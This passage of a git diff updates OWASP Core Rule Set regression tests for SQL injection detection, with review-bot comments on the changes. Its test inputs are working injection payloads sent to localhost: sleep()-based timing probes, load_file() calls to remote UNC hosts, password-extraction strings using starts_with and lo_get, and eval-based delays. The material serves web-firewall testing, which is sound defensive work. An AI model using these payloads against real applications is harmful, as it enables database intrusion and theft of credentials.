log_contains: id "942140" - - - test_title: 942140-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "mysql.db" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "MSysAccessObjects" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "northwind" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SCHEMA_NAME" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "DATABASE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "schema_name" - version: HTTP/1.0 - output: - log_contains: id "942140" - - - test_title: 942140-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "information_schema" - version: HTTP/1.0 - output: - log_contains: id "942140" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index 25c3e10692..3c169b446f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml 
@@ -1,329 +1,329 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942150.yaml - tests: - - - test_title: 942150-1 +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\x22=sleep(12)=\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\x22undefined\x22){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-6 - desc: "Advanced SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/config.txt' (select load_file('\x5c\x5c\x5c\x5cunittests.coreruleset.org\x5c\x5czow')) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-9 - desc: "Simple SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - 
port: 80 - uri: "/" - data: "var=eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: 
HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cunitests.corerule'||'set.org\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5chvs'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-14 - desc: "Advanced SQL injection" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 desc: 
"Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test\x22+eval(compile('for x in range(1):\x5cn import time\x5cn time.sleep(12)','a','single'))+\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test\x22+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\x22" - version: HTTP/1.0 - output: - log_contains: id "942150" - - - test_title: 942150-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 desc: "Simple injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x5cfoobar.txt\x22 or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "SQLite 'json' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "SQLite 'json_valid' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "SQLite 'glob' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml new file mode 100644 index 0000000000..c749e8d8bd --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml 
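Review bot: Test 942150-5 (`- test_title: 942150-5` followed directly by `stages:`) is the only case in this file without a `desc:` line, so a failure report will not say which payload class it exercises; add `desc: "Advanced SQL injection: nested select sleep()"` or similar. The rewrite also renumbers the surviving cases (the old -7/-9/-10 payloads now carry -6/-7/-8) after moving the extractvalue and load_file payloads out to 942151, so a given test id now names a different payload than in the previous release — worth a changelog line if test ids are referenced anywhere. The three new SQLite cases (-17 to -19) only assert a hit; since `json`, `glob` and `json_valid` are ordinary words too, a `no_log_contains` counterpart with a benign value (for example `email=json%20glob%20report`) would guard against false positives, assuming the rule keys on the bare function name — the rule text itself is not in this diff.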
@@ -0,0 +1,190 @@
+---
+meta:
+ author: "Christian Folini,azurit"
+ description: Various SQL injection tests
+ enabled: true
+ name: 942151.yaml
+tests:
+ - test_title: 942151-1
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=foo'||(select extractvalue(xmltype('%tocob;"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-2
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-3
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-4
+ desc: "Simple injection using 'fetch_in_set'"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=, FIND_IN_SET('22', Category )"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-5
+ desc: "SQL injection using 'likelihood' function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-6
+ desc: "SQL injection using SQLite 'sqlite_compileoption_used' function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-7
+ desc: "SQL injection using SQLite 'sqlite_compileoption_get' function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-8
+ desc: "SQL injection using PostgreSQL starts_with() function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/index.php?id=starts_with(password,'a')::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-9
+ desc: "SQL injection using PostgreSQL jsonb_pretty() function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-10
+ desc: "SQL injection using PostgreSQL json_build_object() function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/index.php?id=...(json_build_object(1,password)::jsonb)::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
+ - test_title: 942151-11
+ desc: "SQL injection using unistr() function"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/index.php?id=unistr(password)::int"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942151"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
new file mode 100644
index 0000000000..097ed23fde
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
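Review bot: The description of 942151-4 says `'fetch_in_set'` but the payload on its `data:` line is `FIND_IN_SET('22', Category )`; the MySQL function is FIND_IN_SET, so the line should read `desc: "Simple injection using 'find_in_set'"`. Tests -9 and -10 carry a literal `...` inside the URI (`jsonb_pretty(...(1,password)::jsonb)::int`), which looks like an abbreviated copy of a published payload rather than something an attacker would send; if the rule only needs the function name this is harmless, but a complete expression would make the case reproducible as a curl call. None of the eleven cases is a `no_log_contains` check, so nothing here guards against benign hits on ordinary text containing, say, `starts_with` or `unistr` without a call — assuming the rule, which is not in this diff, requires the parenthesis.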
@@ -0,0 +1,55 @@
+---
+meta:
+ author: "Franziska Bühler"
+ description: Various SQL injection tests
+ enabled: true
+ name: 942152.yaml
+tests:
+ - test_title: 942152-1
+ desc: "SQL injection in request header User-Agent"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942152"
+ - test_title: 942152-2
+ desc: "SQL injection in request header User-Agent"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942152"
+ - test_title: 942152-3
+ desc: "SQL injection in request header User-Agent"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942152"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index 3848e7fcff..e8013ec5f7 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
